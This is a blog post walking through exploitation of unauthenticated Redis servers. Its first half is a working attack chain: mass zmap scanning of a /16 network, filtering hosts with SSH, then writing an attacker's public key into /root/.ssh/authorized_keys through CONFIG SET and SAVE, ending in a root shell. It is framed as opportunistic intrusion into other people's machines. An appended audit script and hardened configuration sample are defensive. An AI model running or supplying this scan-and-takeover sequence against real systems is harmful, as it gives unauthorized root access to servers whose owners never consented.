Exploiting the Redis Unauthorized Access Vulnerability

Posted by mengbo on 2017-08-04

First, bring out the big gun, zmap, to sweep a wide range for machines running the Redis service; aaa.bbb.0.0 is the network planned for scanning.

$ zmap -B 1M -p 6379 aaa.bbb.0.0/16 -o results.csv

Then go through the hosts in results.csv one by one, keeping only those that also accept SSH logins.

$ cat results.csv | xargs nmap -p 22

Finally, pick an inconspicuous environment and get to work; aaa.bbb.ccc.ddd is the target address:

root@ab871b39330f:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
f8:d1:b2:bc:d9:13:13:3d:de:6d:6e:27:bf:28:28:72 root@ab871b39330f
The key's randomart image is:
+---[RSA 2048]----+
|                 |
|                 |
|           .     |
|       . .. o    |
|      . S .o o . |
|       o +o . . o|
|        + .o   o |
|     . E =..  o +|
|      o + .... =+|
+-----------------+
root@ab871b39330f:~# (echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") | redis-cli -h aaa.bbb.ccc.ddd -x set crackit
OK
root@ab871b39330f:~# redis-cli -h aaa.bbb.ccc.ddd
aaa.bbb.ccc.ddd:6379> config set dir /root/.ssh/
OK
aaa.bbb.ccc.ddd:6379> config get dir
1) "dir"
2) "/root/.ssh"
aaa.bbb.ccc.ddd:6379> config set dbfilename "authorized_keys"
OK
aaa.bbb.ccc.ddd:6379> save
OK
aaa.bbb.ccc.ddd:6379> exit
root@ab871b39330f:~# ssh root@aaa.bbb.ccc.ddd
The authenticity of host 'aaa.bbb.ccc.ddd (aaa.bbb.ccc.ddd)' can't be established.
RSA key fingerprint is 0c:9d:60:e6:24:51:07:4d:93:0f:f3:4e:cb:12:ae:43.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'aaa.bbb.ccc.ddd' (RSA) to the list of known hosts.
Last login: Tue Sep 29 15:20:10 2015 from 202.115.16.136
[root@mscopyright1 ~]# pwd
/root
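The session above works only because the Redis instance is reachable from outside, has no password, and still honours CONFIG SET dir / CONFIG SET dbfilename / SAVE from any client. The following audit script, added here as an example and not part of the original post, checks a redis.conf for exactly those conditions and shows a weak configuration next to a hardened one. Both configuration samples are constructed; the finding codes, the function names and the placeholder password value are assumptions of this example.

```python
import re

# Constructed sample: a configuration that permits the attack shown above
# (listening on every interface, no protected mode, no password, CONFIG available).
WEAK_CONF = """
# redis.conf (constructed sample)
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

# Constructed sample: the same instance hardened. REPLACE_WITH_LONG_RANDOM_SECRET
# is a placeholder, not a real credential.
HARDENED_CONF = """
# redis.conf (constructed sample)
bind 127.0.0.1
protected-mode yes
port 6379
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
dir /var/lib/redis
"""

# Values that make `bind` listen on all interfaces.
WILDCARD_BINDS = {"0.0.0.0", "::", "*"}


def parse_redis_conf(text):
    """Parse redis.conf text into {directive: [argument lists]}.

    A directive may appear more than once (e.g. several rename-command lines),
    so each directive maps to a list of its argument lists. Comments and blank
    lines are skipped; directive names are case-insensitive in Redis.
    """
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf


def audit_redis_conf(text):
    """Return a sorted list of finding codes for the settings that enable the
    'write authorized_keys through SAVE' technique. An empty list means none
    of the audited weaknesses is present.
    """
    conf = parse_redis_conf(text)
    findings = []

    # 1. Network exposure: no bind line means all interfaces; so does a wildcard.
    bind_args = conf.get("bind", [[]])[0]
    if not bind_args or any(a in WILDCARD_BINDS for a in bind_args):
        findings.append("bind-all-interfaces")

    # 2. protected-mode exists only from Redis 3.2 on; older servers (the ones
    #    targeted in the post) have no such guard, so an absent setting is
    #    treated as exposed rather than as the newer default of "yes".
    pm = conf.get("protected-mode", [["absent"]])[0]
    if not pm or pm[0].lower() != "yes":
        findings.append("protected-mode-off")

    # 3. Authentication: missing or empty requirepass lets any client issue commands.
    rp = conf.get("requirepass", [[]])[0]
    if not rp or rp[0] in ('""', "''"):
        findings.append("no-requirepass")

    # 4. CONFIG must be disabled (renamed to the empty string) or renamed to
    #    something unguessable; otherwise dir/dbfilename can be retargeted.
    config_disabled = any(
        len(args) >= 2 and args[0].upper() == "CONFIG" and args[1] in ('""', "''")
        for args in conf.get("rename-command", [])
    )
    if not config_disabled:
        findings.append("config-command-enabled")

    return sorted(findings)


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(text) or "no findings")
```

Disabling CONFIG with `rename-command CONFIG ""` is a blunt instrument; if operations tooling needs it, renaming it to a long random string keeps the attack from working while preserving the command for administrators. The audit reads a configuration file, so it complements rather than replaces checking what the running server actually reports.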
